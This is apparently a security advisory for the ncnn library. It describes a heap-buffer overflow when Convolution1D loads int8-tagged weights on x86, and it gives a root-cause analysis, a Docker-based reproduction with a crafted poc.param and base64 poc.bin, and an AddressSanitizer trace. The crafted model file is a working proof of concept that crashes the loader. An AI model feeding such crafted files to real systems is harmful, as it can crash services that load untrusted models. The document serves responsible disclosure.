Int8 Convolution1D Heap-Buffer Overflow
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/convolution1d_packed.h:1039 in convolution1d_transform_kernel_packed
Sanitizer verdict: heap-buffer-overflow
Summary
Convolution1D has no int8 support and no notion of an int8 scale term, but ModelBinFromDataReader will still hand it a byte-sized weight Mat whenever the .bin record carries the int8 tag 0x000D4B38. The x86 create_pipeline() then transforms that buffer as if it held floats, reading four times its length. Loading such a model — here with ncnnoptimize, but ncnn::Net::load_model() is enough — aborts the process inside convolution1d_transform_kernel_packed.
Detail
The weight tensor's element size is chosen by the attacker, in the .bin file, independently of anything in the .param file. Convolution1D::load_model() simply asks the model-bin reader for weight_data_size elements:
// src/layer/convolution1d.cpp:45
weight_data = mb.load(weight_data_size, 0);
if (weight_data.empty())
return -100;
With the leading tag 0x000D4B38, ModelBinFromDataReader::load() takes the int8 branch and returns m.create(w, (size_t)1u) (src/modelbin.cpp:177) — a Mat of w one-byte elements. Unlike Convolution, Convolution1D has no int8_scale_term parameter and no re-quantisation branch, so nothing in the layer notices or rejects weight_data.elemsize == 1. Convolution1D_x86::create_pipeline() derives the input-channel count from the element count and hands the buffer to the packing transform, which reinterprets it as const float*:
// src/layer/x86/convolution1d_x86.cpp:47
int num_input = weight_data_size / kernel_w / num_output;
convolution1d_transform_kernel_packed(weight_data, weight_data_tm, num_input, num_output, kernel_w);
// src/layer/x86/convolution1d_packed.h:944
const float* kptr = (const float*)kernel + q * inh * kernel_w;
// src/layer/x86/convolution1d_packed.h:1037
for (int i = 0; i < 2; i++)
{
g00[0] = k0[0];
k0 += kernel_w;
g00 += 1;
}
The PoC declares 0=1 1=1 2=1 3=1 5=0 6=26, so num_output = 1, kernel_w = 1 and weight_data_size = 26, giving num_input = 26. The transform therefore walks inh = 26 float-sized taps starting at kptr, i.e. 104 bytes, while the underlying allocation is 100 bytes: Mat::create(26, 1u) rounds cstep up to alignSize(26, 16) = 32, adds the 4-byte refcount, and fastMalloc adds the 64-byte NCNN_MALLOC_OVERREAD tail. Only 26 of those bytes are real weights. The two-at-a-time tail loop reaches float index 25 at byte offset 100 — the first address past the region — which is the read AddressSanitizer reports at convolution1d_packed.h:1039.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-int8-convolution1d-heap-buffer-overflow && cd ncnn-poc-int8-convolution1d-heap-buffer-overflow
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_EOF'
7767517
1 1
Convolution1D conv 0 1 out 0=1 1=1 2=1 3=1 5=0 6=26
POC_EOF
base64 -d > poc.bin <<'POC_EOF'
OEsNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
POC_EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0
AddressSanitizer output:
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5100000000a4 at pc 0x591f2a5649d5 bp 0x7ffd880890b0 sp 0x7ffd880890a0
READ of size 4 at 0x5100000000a4 thread T0
#0 0x591f2a5649d4 in convolution1d_transform_kernel_packed /ncnn/src/layer/x86/convolution1d_packed.h:1039
#1 0x591f2a635330 in ncnn::Convolution1D_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution1d_x86_avx512.cpp:49
#2 0x591f21ea5c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#3 0x591f21ea690a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
#4 0x591f21ea6c91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
#5 0x591f21db9caf in main /ncnn/tools/ncnnoptimize.cpp:2797
#6 0x7557e06221c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7557e062228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x591f21d39624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x5100000000a4 is located 0 bytes after 100-byte region [0x510000000040,0x5100000000a4)
allocated by thread T0 here:
#0 0x7557e0c9bf1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x591f21e08bc5 in fastMalloc /ncnn/src/allocator.h:62
#2 0x591f21e08bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
#3 0x591f21e35309 in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:177
#4 0x591f2a511083 in ncnn::Convolution1D::load_model(ncnn::ModelBin const&) /ncnn/src/layer/convolution1d.cpp:45
#5 0x591f21ea5a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
#6 0x591f21ea690a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
#7 0x591f21ea6c91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
#8 0x591f21db9caf in main /ncnn/tools/ncnnoptimize.cpp:2797
#9 0x7557e06221c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x7557e062228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x591f21d39624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/x86/convolution1d_packed.h:1039 in convolution1d_transform_kernel_packed
Credit
Zheng Yu @ DepthFirst